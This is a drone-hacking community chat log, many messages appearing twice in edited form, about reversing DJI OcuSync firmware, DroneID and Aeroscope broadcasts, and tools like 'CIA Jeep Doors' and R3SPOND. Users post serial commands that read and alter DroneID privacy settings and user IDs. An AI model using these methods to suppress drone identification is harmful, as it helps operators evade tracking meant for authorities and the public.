[2022-05-13 15:30:19] fredmicrowave : I have found this one, different, and funny, in a way.... Can´t imagine what goes in their head when they hear that noise... There is also many videos of drones using analog video link and simple osd´s ... They must be careful where your camera is pointing, or shut camera off and activate RTH... https://www.youtube.com/watch?v=XY6YjcUB_3I

[2022-05-13 15:30:19] fredmicrowave : I have found this one, different, and funny, in a way.... Can´t imagine what goes in their head when they hear that noise... There is also many videos of drones using analog video link and simple osd´s ... They must be careful where the camera is pointing, or shut camera off and activate RTH... https://www.youtube.com/watch?v=XY6YjcUB_3I

[2022-05-13 17:57:41] hostile : FWIW the guy in the CNN video is https://twitter.com/brokenpixelua

[2022-05-13 21:00:55] asdasdvoid : asdasdvoid joined the channel.

[2022-05-14 00:22:39] speatuk : @fredmicrowave I would say it was a DJI FPV.

[2022-05-14 04:22:58] hostile : https://www.youtube.com/watch?v=wAnU-4JQPXQ

[2022-05-14 06:38:33] enigma2 : interesting part : dji can support all ocusync versions and chipsets(Lc1860/S1/P1) by only LC1860 . And probably the future versions !

[2022-05-14 06:41:02] enigma2 : it's not fpga implemented that can be updated for future protocols accordingly . it's ASICs.

[2022-05-14 08:51:10] tmbinc : It's heavily DSP based

[2022-05-14 08:51:29] tmbinc : S1 I think is the only one not DSP-based (though I'm not exactly sure how it works there..)

[2022-05-14 09:46:41] tissy : Anyone able to advice on the MCU used for this portable option please?

[2022-05-14 11:34:11] atlantic : drone id did not change between ocusync version. only that extra all zeros symbol at the beginning, but you can ignore that.

[2022-05-14 23:00:28] bri3d : bri3d joined the channel.

[2022-05-15 00:10:42] nmikus : nmikus joined the channel.

[2022-05-15 18:08:44] emeraldmaster : emeraldmaster joined the channel.

[2022-05-15 18:10:13] emeraldmaster : jeep

[2022-05-15 21:31:30] drj84 : drj84 joined the channel.

[2022-05-15 22:44:28] jjbyrnes29 : jjbyrnes29 joined the channel.

[2022-05-16 03:27:07] dronee : dronee joined the channel.

[2022-05-16 06:16:51] nmikus : how do you enable logging on the s1?

[2022-05-16 06:59:58] ninthbit : ninthbit joined the channel.

[2022-05-16 10:26:57] dronedog : dronedog joined the channel.

[2022-05-16 17:18:55] d3vl_jack : d3vl_jack joined the channel.

[2022-05-16 21:22:17] hostile : For those of you that roughly said "DJi Enhanced Wifi should not be being used by either side". Surprise ~enhancedwifi is indeed on the ground. https://twitter.com/666_mancer/status/1525368232110088193

[2022-05-16 21:22:17] hostile : For those of you that roughly said "DJi Enhanced Wifi should not be being used by either side". Surpsired ~enhancedwifi is indeed on the ground. https://twitter.com/666_mancer/status/1525368232110088193

[2022-05-16 21:22:44] hostile :

[2022-05-18 00:44:46] faineg : that video cracked me up a bit in that i've run basic drone training workshops that looked almost identical to this

[2022-05-18 00:45:01] faineg : i suppose "DJI 101" is fairly universal

[2022-05-19 11:20:54] askeloduh : askeloduh joined the channel.

[2022-05-20 16:28:38] peteair : hi all. following the steps for @tmbinc , I'd like to analyze the S1 chip firmware to see if there's more juicy information about the ocusync modulation (like the gold seq seed 0x0102.. found !).

[2022-05-20 16:28:38] peteair : hi all. following the steps of @tmbinc , I'd like to analyze the S1 chip firmware to see if there's more juicy information about the ocusync modulation (like the gold seq seed 0x0102.. found !).

[2022-05-20 16:28:40] peteair : So far, I've been able to: - retrace your conversations and analysis about the RF HW used between Sparrow, Pigeon and co. My understanding is that only the S1 does everything "on-chip" rather than using an (encrypted) FPGA image or externald DSP like in the earlier version or the more recent IE1000 chip that I don't really understand - find a firmware that seems to contain the S1 programming image : "V01.00.0108_Mavic_Air_2_RC_dji_system" (for the RC of the Mavic Air 2 aka wm231 that should use a S1 - after having untaring and unencrypting firmware and module 1301, I find 2 un-encrypted (apart from the 2nd layer of IM*H encryption) binaries ap.img / cp.img => converted to ap_RTOS.bin and cp_RTOS.bin thanks to the IM*H script - I'm pretty sure those "bin" are not encrypted cause the entropy is rather low and there are a lot of strings inside (not like another ap_RTOS / cp_RTOS I got from another more recent FW) - from there, my understanding is that I should analyze those bins in IDA (or Ghidra that I prefer) and as it's flat images (like mentionned by a few people here before) use the entry point found in the IM*H header

[2022-05-20 16:28:40] peteair : So far, I've been able to: - retrace your conversations and analysis about the RF HW used between Sparrow, Pigeon and co. My understanding is that only the S1 does everything "on-chip" rather than using an (encrypted) FPGA image like in the earlier version or the more recent IE1000 chip that I don't really understand - find a firmware that seems to contain the S1 programming image : "V01.00.0108_Mavic_Air_2_RC_dji_system" (for the RC of the Mavic Air 2 aka wm231 that should use a S1 - after having untaring and unencrypting firmware and module 1301, I find 2 un-encrypted (apart from the 2nd layer of IM*H encryption) binaries ap.img / cp.img => converted to ap_RTOS.bin and cp_RTOS.bin thanks to the IM*H script - I'm pretty sure those "bin" are not encrypted cause the entropy is rather low and there are a lot of strings inside (not like another ap_RTOS / cp_RTOS I got from another more recent FW) - from there, my understanding is that I should analyze those bins in IDA (or Ghidra that I prefer) and as it's flat images (like mentionned by a few people here before) use the entry point found in the IM*H header

[2022-05-20 16:29:22] peteair : I see a lot of decompiled functions in ghidra but I must admit I'm a bit lost after that

[2022-05-20 16:29:59] peteair : I don't expect you (especially @tmbinc ) give all that intel for free but I would appreciate any hints or confirmation that I'm on the right track :-D

[2022-05-20 16:29:59] peteair : I don't expect you (especially @tmbinc ) to give all that intel for free but I would appreciate any hints or confirmation that I'm on the right track :-D

[2022-05-20 16:30:43] tmbinc : I think you're generally on the right track

[2022-05-20 16:30:50] peteair : I also got a "loader.img" file from the 1301 module, the "IM*H" part is a bit further away

[2022-05-20 16:31:10] tmbinc : make sure you understand the memory map, especially how CP and AP share data (there's some offset where each one can see into the other SRAM)

[2022-05-20 16:31:15] peteair : I don't know if I need to use that before to understand the ap / cp images or if the ap / cp image can be analyzed directly

[2022-05-20 16:31:27] tmbinc : No you can start right with AP+CP

[2022-05-20 16:31:33] peteair : hey ! thank you for your instant answer :-D

[2022-05-20 16:31:41] peteair : ok that's good to know thanks

[2022-05-20 16:32:01] tmbinc : Bootrom (executes on AP) loads loader.bin, loader.bin then loads cp.bin and ap.bin and runs both.

[2022-05-20 16:32:19] tmbinc : loader.bin determines mp_state etc. and derives a few keys and so on but nothing of that is important

[2022-05-20 16:32:24] tmbinc : (for understanding)

[2022-05-20 16:32:46] tmbinc : AP is "relatively" simple, also thanks to the strings etc. in it

[2022-05-20 16:32:49] peteair : ok and as there's no further encryption done by loader / boot, analyzing directly ap / cp images should be enough right ?

[2022-05-20 16:33:09] tmbinc : if you have decrypted CP+AP then yes that's it

[2022-05-20 16:33:12] peteair : ok I've just directly looked at CP for the moment but thanks for the hint :D

[2022-05-20 16:33:19] tmbinc : keep in mind to expand the compressed data section if you care

[2022-05-20 16:33:40] peteair : hm ok. not there yes I guess

[2022-05-20 16:33:45] tmbinc : CP is insanely difficult to understand (for me, at least) unless you know the rough structure of how the RF protocol is implemented

[2022-05-20 16:34:07] tmbinc : especially because it has no strings, only these tracepoints

[2022-05-20 16:34:14] peteair : that's the idea :D I followed your common work on ocusync reverse with attention and I've got some experience with OFDM and LTE

[2022-05-20 16:34:28] peteair : I hope to be able to understand a few things but yeah I guess that's not so simple

[2022-05-20 16:34:50] peteair : my first idea was to start from interestring strings in CP like RSRP eg. that makes sense

[2022-05-20 16:35:02] peteair : and see where it's used

[2022-05-20 16:38:16] tmbinc : That works but the issue is that CP has so few strings due to memory pressure

[2022-05-20 16:38:32] tmbinc : Back on LC1860 some of the log items were still strings

[2022-05-20 16:38:38] tmbinc : But by now everything is only IDs

[2022-05-20 16:38:43] peteair : hm ok

[2022-05-20 16:40:51] peteair : ok thanks for that :+1: I'll look at it and keep you posted

[2022-05-20 16:43:08] joonas : P1 CP has a lot of strings, maybe that's a better target?

[2022-05-20 16:45:35] peteair : hi @joonas ! I've seen some of your messages as well on that topic, thx for your contribution :D

[2022-05-20 16:45:51] peteair : I thought that on P1 the RF work was done on external DSP ?

[2022-05-20 16:46:03] joonas : ah, yes, i think you're right

[2022-05-20 16:46:06] peteair : and so not "everything" is in the same image

[2022-05-20 16:46:23] joonas : i know jack shit about OFDM / LTE so i'm following with extreme interest :)

[2022-05-20 16:46:30] peteair : ahaha I guess

[2022-05-20 16:47:09] peteair : and so has both of you any good sources / reference about ARM reversing ?

[2022-05-20 16:47:42] peteair : i've done a few x86 reversing before but that's definitely not my forte

[2022-05-20 16:49:13] joonas : i open ghidra and then make like a money with a typewriter and then maybe 6 months later something comes out. mostly i just pester tmbinc.

[2022-05-20 16:49:50] joonas : so if you find anything good, send it over to me too :)

[2022-05-20 16:51:35] bri3d : if you haven't already seen it, the best thing you need to know to start is that the images have their base load address defined - it's in the ini file associated with the bin. basically load em up at the correct address and start plugging away in ghidra

[2022-05-20 16:52:13] peteair : yep ! understood that in the IM*H header and done that

[2022-05-20 16:52:13] peteair : yep ! understood that in the IM*H and done that

[2022-05-20 16:52:19] peteair : but that was only the easy part :D

[2022-05-20 16:52:45] peteair : ahaha I'll try the monkey way and keep you updated

[2022-05-20 16:52:45] peteair : ahaha I'll try the monke way and keep you updated

[2022-05-20 16:54:50] bri3d : I just do the monkey way. My big tip is label _everything_

[2022-05-20 16:55:02] bri3d : if you see an access to a memory address and you think you _might_ have an inkling what it does, label it right away

[2022-05-20 16:55:08] bri3d : then when you see it somewhere else, you can refine your label

[2022-05-20 16:55:13] bri3d : and eventually you understand what is going on

[2022-05-20 16:56:10] peteair : good tip thx !

[2022-05-22 09:13:44] jack117wb : jack117wb joined the channel.

[2022-05-22 12:08:04] peteair : Very interesting article about different DJI RF architecture: https://www.google.com/amp/s/www.suasnews.com/2022/05/the-dji-p1-and-s1-fpv-chipset-its-not-all-that/

[2022-05-22 12:09:41] peteair : Is Ian Lewis someone from here ?

[2022-05-22 12:10:17] joonas : this largely comes down to our own @tmbinc's work and what's filtered up through the fpv community (myself included).

[2022-05-22 12:10:17] joonas : this largely comes down to our own @tmbinc's work and what's filtered through the fpv community (myself included) up to Ian.

[2022-05-22 12:10:52] joonas : Ian is @mad_angler1 on here.

[2022-05-22 12:17:39] peteair : :+1: thanks

[2022-05-22 21:46:22] jjbyrnes29 : https://youtu.be/4LSD9PTN6Zg

[2022-05-22 21:46:54] jjbyrnes29 : Interesting video here, had a thought that you guys might want to test

[2022-05-22 21:48:30] jjbyrnes29 : In the video, the guy keeps mentioning a communication packet being sent on a specific frequency regardless of the channel being selected, possibly for testing of communication issues

[2022-05-22 21:48:51] jjbyrnes29 : What if aeroscope's drone ID also resides on that packet being sent out?

[2022-05-22 21:50:21] jjbyrnes29 : That would make sense a bit if true, as the controller could verify UUID in the packet to make sure its talking to the correct drone, and aeroscope would just passively listen on that frequency

[2022-05-22 21:50:52] jjbyrnes29 : Someone needs to test this, I dont have an oscilloscope handy and my Mini 2 is well...gone.

[2022-05-22 21:51:28] joonas : the fpv system doesn't show up on aeroscope.

[2022-05-22 21:52:36] joonas : if you go back above in this chat all aeroscope related packets have been documented already in one form or another afaik.

[2022-05-22 21:57:12] jjbyrnes29 : You sure about that @joonas?

[2022-05-22 21:58:23] joonas : DJI FPV = the DJI FPV drone, DJI FPV System = what Ian is analyzing, it's using the DJI FPV Air Unit along with the FPV Goggles on custom built quads.

[2022-05-22 21:58:23] joonas : DJI FPV = the DJI FPV drone, DJI FPV System = what Ian is analyzing, it's using the DJI FPV Air Unit along with the FPV Goggles on custom build quads.

[2022-05-22 21:59:03] joonas : https://www.dji.com/ee/fpv

[2022-05-22 22:05:14] jjbyrnes29 : Ah my bad

[2022-05-22 22:06:55] jjbyrnes29 : Ill add SDR to the list of things to buy, ideally id like to contribute, not sure when I can

[2022-05-23 09:20:42] hezerlight : hezerlight joined the channel.

[2022-05-23 11:56:43] bod : bodopo joined the channel.

[2022-05-24 18:43:16] devdriver : devdriver joined the channel.

[2022-05-25 13:51:00] squeck : squeck joined the channel.

[2022-05-25 15:11:15] h_marshall : Hey everyone I have a problem with Parrot's implementation of drone id i've described it more detailed in general chat https://dji-rev.com/dji-rev/pl/8pd9i65633gzfrmcdh5wqat7ue @hostile advised me to discuss it here and asked for firmware image. I don't have any image currently firmware updates happens through mobile app and i didn't find any images to download from the web. I know that Parrot have SDK and i founded list of open sources modules used in firmware. SDK: https://github.com/Parrot-Developers/groundsdk-android Anafi firmware: https://github.com/parrot-opensource/anafi-opensource SkyController 3 (RC) firmware: https://github.com/parrot-opensource/skycontroller3-opensource I also figured out that it is possible to connect to drone and RC via ADB and there should be some config files like /data/lib/mppd/mapping_anafi4k.cfg for RC where you can change some parameters https://parrotpilots.com/threads/skycontroller-3-mod-for-smoother-motion.4176/ Would appreciate any help or advise

[2022-05-25 15:14:57] hostile : install kismet for us take a capture

[2022-05-25 15:15:14] hostile : last I checked they did nothing special with their normal wifi, lets look there first. then we can look for some weird out of band shit.

[2022-05-25 15:15:37] hostile : older parrot products detected just fine with kismet

[2022-05-25 15:21:10] h_marshall : ok, will do and get back to with results

[2022-05-25 19:39:08] atlantic : yes parrot has eu drone id, just in the management beacon. if you disable it via the app, it only transmits your serial number iirc.

[2022-05-25 19:40:45] atlantic : just put your wifi card in monitor mode and put wireshark on it, filter the beacons and look for those vendor specific tags. there is a parrot tag and a eu drone id tag.

[2022-05-25 19:41:35] atlantic : i assume that is how most drones will work if they are compliant with eu law.

[2022-05-25 21:43:51] dreamer : dreamer joined the channel.

[2022-05-28 09:27:33] batko001 : batko001 joined the channel.

[2022-05-28 23:50:42] jcga : jcga joined the channel.

[2022-05-31 08:04:19] theufodroner : theufodroner joined the channel.

[2022-05-31 14:45:57] hostile : I wish we could get to this point. That we had a standard kit, and a backend to report from trusted users.

[2022-05-31 14:46:08] hostile :

[2022-05-31 22:36:12] hotelzululima : problm is the freq.. adsb was on a freq that is easily monitored by a 10$RTL which doesnt operate at 2.4ghz..

[2022-05-31 23:45:10] hostile : hackrf or similar reception for *some* would be enough to get a community up. even any other reasonably priced.

[2022-05-31 23:45:10] hostile : hackrf or similar reception for *some* would be enough to get a community up. even any other reasonably priced SDR.

[2022-06-01 01:05:01] dkovar : Once RemoteID comes out, I suspect all of the ADSB based services will track drones as well.

[2022-06-01 04:21:18] jezzab : 0x0102

[2022-06-01 11:43:57] fredmicrowave : Yes, 2.4ghz is very common and antennas even easier to get than those for 1090mhz .

[2022-06-01 19:15:30] dragorn : However 2.4ghz SDRs are not.

[2022-06-01 19:15:59] dragorn : Conceivably someone could make a frequency converter if it's done with non-wifi/non-bt data

[2022-06-01 19:16:23] dragorn : like the ham-it-up upverters to bring LF up into cheap rtlsdr territory

[2022-06-01 19:51:12] superlogical : https://www.crowdsupply.com/cariboulabs/cariboulite-rpi-hat

[2022-06-01 19:53:55] superlogical : Sadly sampling rate too low

[2022-06-02 16:10:50] fredmicrowave : I thought they were more common.,.But HackRf one can be found from ~110usd

[2022-06-03 09:07:16] oxolot : oxolot joined the channel.

[2022-06-03 19:49:35] shiftag : shiftag joined the channel.

[2022-06-05 16:22:30] laen : laen joined the channel.

[2022-06-06 14:30:37] dragorn : I'd counter argue that I've had a caribou on order since they were announced and no sign of them shipping so that's not exactly available... and a "hackrf" at $120 has got to be a clone model which has some historic awfulness in the components which seriously impact the rf quality. (the "hackrf blue" stuff is really awful quality because they swapped a ton of components for cheaper models when they took the design)

[2022-06-07 17:46:24] hotelzululima : thing is.. what drove ADSB network interception adoption was the cheap and widespread availability of a DVB-T USB receiver that could be repurposed as a rx SDR covering ADS-B, we dont have that factor here

[2022-06-07 21:41:06] dkovar : Remote ID, when it comes out, uses Bluetooth.

[2022-06-07 22:57:13] dragorn : Assuming it works on the basic announcement channels, that's fairly simple then - and cheap. The TI CC2540 series can do btle announcement sniffing for $10. The firmware is absolute trash, tho.

[2022-06-07 22:57:40] dragorn : BT classic on the other hand, or anything not on the basic announcement channels, is harder to do raw sniffing on

[2022-06-08 02:35:17] cyberid10t : id10t joined the channel.

[2022-06-08 18:09:39] dragorn : FWIW just got a status update on the caribou sdr; they just now got all the components, delivery maybe in october.

[2022-06-09 14:26:37] retina : Hi , I'm excited about Dji_Droneid. I have a DJI Aeroscope and a USRP B210. Furthermore, I want to test the Aeroscope by sending a DroneID burst using your code

[2022-06-09 14:27:53] hostile : @retina great news... https://github.com/proto17/dji_droneid/issues/5#issuecomment-1151186266

[2022-06-09 14:39:43] retina : Hi everyone, I'm excited about your fantastic work. https://github.com/proto17/dji_droneid :heart_eyes: I have a USRP B210 & Mavic 2. Furthermore, I want to test the Dji_DroneID burst using that code. But I don't have **Dji Mavic Mini to capture signal**. You can share the DroneID burst signal. The Dji signal can capture in the room for not receiving a GPS signal. :+1:

[2022-06-09 14:49:10] hostile : you can use the repo to generate frames...

[2022-06-09 14:49:44] hostile : https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m

[2022-06-10 09:56:31] lazypilot : lazypilot joined the channel.

[2022-06-10 12:07:53] testuser00001 : Hey all, thank you for the work you put in to this. I have a question — if drone id is enabled, does it broadcast the live remote location or just the identified RTH in addition to the drone location?

[2022-06-10 14:34:34] testuser00001 : I see in the aeroscope docs it just grabs the RTH but wanted to make sure

[2022-06-10 17:29:26] tmbinc : It broadcasts 3 locations - app location, rth location and uav location

[2022-06-13 08:43:21] albertoe : albertoe joined the channel.

[2022-06-13 19:37:38] rrcoolh : rrcoolh joined the channel.

[2022-06-14 22:09:09] laen : I'm assuming if you disable location services and data to the DJI app it will disable the controller location broadcast? Will the DJI FLY app force you to enable those services to start flying? I'd like to to maintain cell/wifi connection on my phone during flying for messenger/chat purposes. Disabling those services seems to work with my testing with the DJI GO app - just wanna make sure I'm not missing anything before I grab a Mavic 3 and start using the DJI FLY app... like a GPS receiver embedded into the controller.

[2022-06-15 00:51:38] fredmicrowave : You can disable GPS and still fly: The app will show notifications, but wont force you. M3 flies perfectly in airplane mode, with phone GPS disabled. Original remote has no GPS Imo, cell should be OK, but app data disabled.

[2022-06-15 13:26:08] retina : Having trouble with demodulate DJI DroneID frames :thinking_face: https://github.com/proto17/dji_droneid/issues/9

[2022-06-15 14:35:14] hostile : Interesting realities within. https://www.youtube.com/watch?app=desktop&v=SXwMJpPtxtM

[2022-06-15 15:05:41] eddy : Aeroscope :: Be careful with the DJI fly app on Android. I found that after deactivating the AS. The application reactivates it after switching to the "Menu >> Safety >> Aeroscope" page. (it is not necessary to change any parameter on this tab) Change status from [00] to [5f] or even [ff]. [Tested with command:: comm_serialtalk.py comxy -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 06] After deactivation of AS, the output is follows:: 55 13 04 03 03 0a 00 00 80 03 da 06 00 00 00 00 00 8d 1f After opening the aeroscope tab on DJI fly apk [android]:: 55 13 04 03 03 0a 00 00 80 03 da 06 00 5f 00 00 00 62 78 or:: 55 13 04 03 03 0a 00 00 80 03 da 06 00 ff 00 00 00 5f da ---------------------------------- Aircraft: Mini 2 Aircraft firmware: 01.03.0000 RC firmware: 02.00.1101 apk version: 1.4.2

[2022-06-15 15:51:02] hostile : track specific versions...

[2022-06-15 15:51:24] hostile : DJI *IS* making changes. They hit the CIA Jeep Doors repo from their internal confluence weeks ago

[2022-06-15 15:51:34] hostile : times will change moving forward. the snapshot in time has been created.

[2022-06-15 20:36:41] tmbinc : Ah yes I was wondering why there is new Mini 2 firmware...

[2022-06-15 20:57:13] oxolot : Maybe there is a way to block access to that menu item?

[2022-06-16 07:07:49] eddy : So far, after my further testing, only this item seems to be problematic in my case. But you have to be careful.

[2022-06-16 09:55:21] kvazdopil : kvazdopil joined the channel.

[2022-06-16 16:05:37] lazypilot : so the cia jeep doors duml command "sticks" and survives restarts? i was going to add it to the AC's startup script :D

[2022-06-16 16:05:37] lazypilot : so the cia jeep doors duml command "sticks" and survives restarts? i was going to add it to start_dji_system.sh :D

[2022-06-16 18:49:30] laen : Are you saying that the "Menu >> Safety >> Aeroscope" page only reactivates AS for *you*? Or that the "Menu >> Safety >> Aeroscope" page is the only instance where you find AS reactivating for everyone on 01.03.0000?

[2022-06-17 09:23:45] eddy : According to my findings, I have only encountered this one problem so far. I haven't tried newer versions of Dji-fly, they may behave differently. I welcome any feedback.

[2022-06-18 06:34:13] nz-maori : prgogress

[2022-06-18 06:35:58] nz-maori : april 01

[2022-06-18 11:55:26] kinev1337 : kinev1337 joined the channel.

[2022-06-19 08:19:46] anzz : 7928833 joined the channel.

[2022-06-19 10:27:26] nz-maori : maybe a silly question, but I didn’t found a solution here in the chat. I ‘ m trying to test CIAJD on my Air2s (FW 1690) with no success. Seems that I can’t get a serial port to AC. Installed Python3 but when I start CIAJD.py a cmd window pops up and closes immediately. Is the Air2s compatible for this hack? Any advice will be appreciated….

[2022-06-19 10:54:49] joonas : @nz-maori try --bulk instead of --port, i think the air2s might use the bulk usb interface instead of the serial interface

[2022-06-19 10:55:23] joonas : i think it's just --bulk, you don't need to specify the device, it should be auto detected

[2022-06-19 10:58:59] nz-maori : Thank you will give it a try

[2022-06-19 13:36:26] laen : On macOS you'll need to specify the device - but it shouldn't affect the immediate closing of the window issue you're having. If you can catch the text before the window closes that'd be helpful, sometimes I gotta smash printscreen to catch it at the right moment.

[2022-06-19 13:38:51] joonas : oh, sorry, i didn't read the messages properly. if you're just double clicking the icon then that would happen yeah. i think i need to specify the serial port on windows too. you should run ciajeepdoors.py via the terminal to get the output and set the proper options.

[2022-06-19 13:39:24] joonas : or alternatively just try this instead: https://r3spond.d3vl.com/

[2022-06-19 13:39:43] joonas : only works with usb serial based drones, not the newer ones that require a bulk connection. yet.

[2022-06-19 13:39:43] joonas : only works with usb serial based drones, not the newer ones that require a bulk connection.

[2022-06-19 13:40:02] laen : I just tested on windows too - the window will popup and close immediately if you don't run it from root directory of the OG tools - follow the instructions exactly.

[2022-06-19 14:09:25] nz-maori : @joonas thank you for this fast support, I’ve used the Website above and it worked flawlessly ;-). I ‘ve noticed that I have to release a specific port for the procedure. Maybe that was the fault by using CIAJD via cmd. Now I need an Android Device as Fly App (IOS) is unusable…

[2022-06-19 16:35:59] nz-maori : Only for Feedback: tested DJI Fly App 1.4.8 (IOS) = DroneID is enabled again, Maven App 3.11.5 (IOS) = DroneID stays disabled

[2022-06-19 16:39:07] joonas : yeah all fly versions on ios do that (with ciajeepdoors too). that's why the page says ios is not compatible. i'll forward maven to the author so they can link it on the page.

[2022-06-19 19:17:01] ttp499 : ttp499 joined the channel.

[2022-06-20 19:56:32] deniss-i979 : deniss-i979 joined the channel.

[2022-06-20 20:51:29] oxolot : When I run py comm_serialtalk.py --bulk -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 06 on M3, I get this huge continuous packet in response: 55 84 04 ae 03 0a 00 00 80 03 da 0b 00 05 1e f0 00 00 00 00 00 00 e6 07 06 13 10 2d 37 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 23 2d 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 13 19 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 11 25 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 6e a9 can someone explain what this is?

[2022-06-20 20:51:29] oxolot : When I run py comm_serialtalk.py --bulk -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0b on M3, I get this huge continuous packet in response: 55 84 04 ae 03 0a 00 00 80 03 da 0b 00 05 1e f0 00 00 00 00 00 00 e6 07 06 13 10 2d 37 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 23 2d 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 13 19 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 11 25 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 6e a9 can someone explain what this is?

[2022-06-20 20:51:29] oxolot : When I run py comm_serialtalk.py --bulk -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0b on M3, I get this huge continuous packet in response: `55 84 04 ae 03 0a 00 00 80 03 da 0b 00 05 1e f0 00 00 00 00 00 00 e6 07 06 13 10 2d 37 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 23 2d 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 13 19 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 e6 07 06 13 10 11 25 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 39 32 34 38 6e a9` can someone explain what this is?

[2022-06-20 20:51:29] oxolot : When I run py comm_serialtalk.py --bulk -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0b on M3, I get this huge continuous packet in response: `55 84 04 ae 03 0a 00 00 80 03 da 0b 00 05 1e f0 00 00 00 00 00 00 e6 07 06 13 10 2d 37 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38 e6 07 06 13 10 23 2d 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38 e6 07 06 13 10 13 19 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38 e6 07 06 13 10 11 25 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38 6e a9` can someone explain what this is?

[2022-06-20 22:08:47] tmbinc : Command 0xDA, subcommand 0x0B is "get all user ID", it returns up to 5 UUIDs (perhaps the last 5 used? Don't know.)

[2022-06-20 22:08:47] tmbinc : Command 0xDA, subcommand 0x0B is "get user ID", it returns up to 5 UUIDs (perhaps the last 5 used? Don't know.)

[2022-06-20 22:12:16] tmbinc : -x 08 should give you the current one, -x 07 with some more data lets you somehow set that

[2022-06-21 06:19:09] oxolot : -x 08 gives me this `55 10 04 56 03 0a 00 00 80 03 da 08 00 00 1a 3b` and -x 07 gives `55 0f 04 a2 03 0a 00 00 80 03 da 07 00 08 ea` which is not looking really similar (at least to me) with the result of -x 0b above, although it does look like a chain consisting of 5 repeats. BTW, how can I change anything at this location: 0xDA, subcommand 0x0B? I want to try to erase it in the drone.

[2022-06-22 09:00:45] digitalshaman : digitalshaman joined the channel.

[2022-06-22 16:00:33] lurker : what could be the Issue with R3SPOND. Tryed a lot, always get "Oops! There's been an issue verifying your settings." on two PC running Win10 with an old Mavic Pro 1? Thanks!

[2022-06-22 19:49:24] fly4y : fly4y joined the channel.

[2022-06-23 07:43:16] joonas : that implies when r3spond tried to read back the privacy bits it got an unexpected result. i.e. the privacy bits didn't stick.

[2022-06-23 07:43:55] joonas : interesting. the one device i helped test this with during dev was a mavic pro platinum.

[2022-06-23 07:44:28] joonas : @d3vl_jack is behind r3spond, maybe he can offer some further insights. i.e. where to check what was reported back exactly.

[2022-06-23 08:52:45] lurker : Yeah, does not work for me. MP1 on 1.03.700. It says connected but only when i select com from list, not automatically. Tested with latest chrome. edge same. will dig into command line jeep doors this weekend..

[2022-06-23 09:39:36] d3vl_jack : Pretty much echoing what Joonas has said there; are you able to read the settings without settings any? Far right button

[2022-06-23 10:24:54] heash : heash joined the channel.

[2022-06-23 11:14:29] fredmicrowave : If I may add a (positive) comment: When I checked R3espond page I noticed that no drone in the list was supported - Doubting it would support all the other non-listed ones, I did not really understood what was its purpose, and concluded it was an indirect promotion for Maven. This is just sharing a superficial experience, if it can help.

[2022-06-23 11:18:20] joonas : good feedback. the reason for the non supported list is that those are the one's we know to require the newer usb bulk interface. everything older with the serial interface _should_ work (at least as well as it does with ciajeepdoors). Maven was actually only added a few days ago as we discovered it's a working solution for iOS. but the confusion is understandable. tagging @d3vl_jack so he sees this.

[2022-06-23 11:22:46] d3vl_jack : Something to revisit and clear up then, thanks for the feedback

[2022-06-23 11:28:10] lurker : no, could not read the settings either. Also says "Oops! There's been an issue verifying your settings."

[2022-06-23 11:28:49] joonas : anything in the javascript debug console?

[2022-06-23 11:39:04] joonas : i guess try with ciajeepdoors as well. they should operate exactly the same. maybe you have a weird firmware version.

[2022-06-23 12:31:50] lurker : JS console says DevTools failed to load source map: Could not load content for https://r3spond.d3vl.com/assets/css/bootstrap.min.js.map: HTTP error: status code 404, net::ERR_HTTP_RESPONSE_CODE_FAILURE

[2022-06-23 13:34:14] testuser00001 : That’s not a problem, map isn’t needed for operation

[2022-06-24 06:23:30] myidthefrog : myidthefrog joined the channel.

[2022-06-24 14:43:05] kostya2005 : kostya2005 joined the channel.

[2022-06-24 20:37:40] tmbinc : Wow so they added Japan's RID for Mini2? Which is (according to https://members.wto.org/crnattachments/2021/TBT/JPN/21_4420_00_e.pdf) BT, BTLE or Wifi? To an existing device? Did they add coexistence to that device so S1 can be used for C2 and Wifi/BT for RID?

[2022-06-26 11:36:29] eddy : FYI - DJI mini3 has Remote ID activated by default. It's verified by me using "https://github.com/proto17/dji_droneid" Any idea what to do with that? -------------------------------------------------- ----- Aircraft firmware: 01.00.0100 RC firmware: 01.00.0200 apk version: 1.6.1

[2022-06-26 11:36:29] eddy : FYI - DJI mini3 has Remote ID activated by default. It's verified by me using "https://github.com/opendroneid/receiver-android" -------------------------------------------------- ----- Aircraft firmware: 01.00.0100 RC firmware: 01.00.0200 apk version: 1.6.1 more info:: https://www.youtube.com/watch?v=mE0YVdilcFI

[2022-06-26 11:36:29] eddy : FYI - DJI mini3 has Remote ID activated by default. It's verified by me using "https://github.com/opendroneid/receiver-android" Any idea what to do with that? -------------------------------------------------- ----- Aircraft firmware: 01.00.0100 RC firmware: 01.00.0200 apk version: 1.6.1 more info:: https://www.youtube.com/watch?v=mE0YVdilcFI

